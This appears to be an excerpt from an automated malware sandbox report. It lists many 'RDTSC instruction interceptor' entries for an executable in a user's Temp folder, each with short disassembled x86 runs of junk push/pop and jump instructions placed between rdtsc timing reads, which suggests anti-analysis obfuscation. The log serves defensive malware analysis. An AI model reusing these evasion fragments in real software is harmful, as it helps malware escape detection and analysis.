Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 64A604 second address: 64A60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 64A60B second address: 64A612 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 618E2E second address: 618E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6560AC second address: 6560B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6560B0 second address: 6560C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jbe 00007F3838E06D16h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F3838E06D16h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6560C8 second address: 6560D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6560D6 second address: 6560DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 65BE5D second address: 65BE68 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F3838D0CF46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 65BE68 second address: 65BE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3838E06D1Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 65BE7C second address: 65BE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 65CC21 second address: 65CC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3838E06D29h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 662FF0 second address: 663000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3838D0CF4Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 663000 second address: 66303B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F3838E06D25h 0x0000000f pushad 0x00000010 popad 0x00000011 jng 00007F3838E06D16h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 665A5E second address: 665A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 665A63 second address: 665A91 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3838E06D21h 0x00000008 jmp 00007F3838E06D1Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3838E06D26h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 665CC8 second address: 665CF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3838D0CF46h 0x00000009 je 00007F3838D0CF46h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F3838D0CF52h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 665CF1 second address: 665D0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 665DC7 second address: 665DE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3838D0CF52h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 665DE2 second address: 665DE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 665DE8 second address: 665DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6663C2 second address: 6663C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6663C8 second address: 6663CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66954B second address: 669551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 669551 second address: 669555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 669D79 second address: 669D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66A9D5 second address: 66AA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 mov esi, dword ptr [ebp+122D2CB8h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F3838D0CF48h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a jno 00007F3838D0CF46h 0x00000030 push 00000000h 0x00000032 mov si, 7130h 0x00000036 xchg eax, ebx 0x00000037 je 00007F3838D0CF4Eh 0x0000003d je 00007F3838D0CF48h 0x00000043 push edi 0x00000044 pop edi 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66AA22 second address: 66AA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66AA29 second address: 66AA30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66B1E9 second address: 66B214 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jng 00007F3838E06D2Fh 0x00000011 pushad 0x00000012 jmp 00007F3838E06D21h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66E6F8 second address: 66E78F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D199Ch] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F3838D0CF48h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c or dword ptr [ebp+122D1A46h], edi 0x00000032 mov edi, dword ptr [ebp+12468697h] 0x00000038 movsx edi, si 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F3838D0CF48h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 or dword ptr [ebp+122D19F8h], eax 0x0000005d xchg eax, esi 0x0000005e jmp 00007F3838D0CF4Bh 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 jmp 00007F3838D0CF55h 0x0000006c jg 00007F3838D0CF46h 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66E78F second address: 66E799 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3838E06D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66E91A second address: 66E91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66E91E second address: 66E9CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F3838E06D18h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D194Ch] 0x0000002a mov edi, dword ptr [ebp+122D2A54h] 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov edi, 28E3BD5Eh 0x0000003c js 00007F3838E06D1Ch 0x00000042 mov ebx, dword ptr [ebp+122D1EE8h] 0x00000048 mov dword ptr fs:[00000000h], esp 0x0000004f sub ebx, 4F56655Ah 0x00000055 mov eax, dword ptr [ebp+122D1125h] 0x0000005b mov ebx, dword ptr [ebp+122D24FCh] 0x00000061 push FFFFFFFFh 0x00000063 push 00000000h 0x00000065 push esi 0x00000066 call 00007F3838E06D18h 0x0000006b pop esi 0x0000006c mov dword ptr [esp+04h], esi 0x00000070 add dword ptr [esp+04h], 0000001Ah 0x00000078 inc esi 0x00000079 push esi 0x0000007a ret 0x0000007b pop esi 0x0000007c ret 0x0000007d jc 00007F3838E06D1Ch 0x00000083 xor ebx, 694E6F07h 0x00000089 push eax 0x0000008a pushad 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007F3838E06D1Fh 0x00000092 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66FB33 second address: 66FB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66FB37 second address: 66FB3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66FB3B second address: 66FB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 66FB45 second address: 66FB49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 673C85 second address: 673C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 673C8B second address: 673CF4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F3838E06D18h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 jmp 00007F3838E06D1Bh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F3838E06D18h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a adc edi, 59D719F0h 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 ja 00007F3838E06D1Ch 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 671ADD second address: 671AE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 673CF4 second address: 673D0F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3838E06D1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jno 00007F3838E06D16h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 673D0F second address: 673D19 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3838D0CF4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 674BF8 second address: 674BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 676DC8 second address: 676E3F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3838D0CF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F3838D0CF48h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push ecx 0x00000015 jmp 00007F3838D0CF4Eh 0x0000001a pop ecx 0x0000001b nop 0x0000001c jmp 00007F3838D0CF57h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007F3838D0CF48h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d sub bl, 0000004Eh 0x00000040 add edi, dword ptr [ebp+122D1FC5h] 0x00000046 push 00000000h 0x00000048 mov dword ptr [ebp+122D1951h], ecx 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 pop edi 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 675EF4 second address: 675EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 677D5B second address: 677D65 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3838D0CF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 677D65 second address: 677D85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c je 00007F3838E06D16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 677058 second address: 677060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 677E29 second address: 677E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 677E2D second address: 677E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 677E33 second address: 677E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 677E39 second address: 677E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 678DC7 second address: 678DCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67B00E second address: 67B017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67B017 second address: 67B01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67A1A4 second address: 67A1AE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3838D0CF4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67B23C second address: 67B243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67D148 second address: 67D14E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67D14E second address: 67D152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67C146 second address: 67C14A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67E006 second address: 67E03B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push ebx 0x0000000c jng 00007F3838E06D1Ch 0x00000012 pop edi 0x00000013 mov dword ptr [ebp+122D2886h], ebx 0x00000019 push 00000000h 0x0000001b mov ebx, edi 0x0000001d push 00000000h 0x0000001f and di, 02EDh 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 ja 00007F3838E06D18h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67E03B second address: 67E04E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3838D0CF4Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67D349 second address: 67D35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jnc 00007F3838E06D16h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67E231 second address: 67E23D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 67F168 second address: 67F16C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 62485E second address: 624864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 68707C second address: 6870A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F3838E06D29h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 68B180 second address: 68B184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 68B184 second address: 68B18E instructions: 0x00000000 rdtsc 0x00000002 je 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 68B18E second address: 68B194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 68B194 second address: 68B198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 691B63 second address: 691B75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F3838D0CF4Ah 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 690FF6 second address: 690FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 690FFA second address: 69100A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F3838D0CF46h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 69100A second address: 691010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 691010 second address: 691023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3838D0CF4Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 691023 second address: 691027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
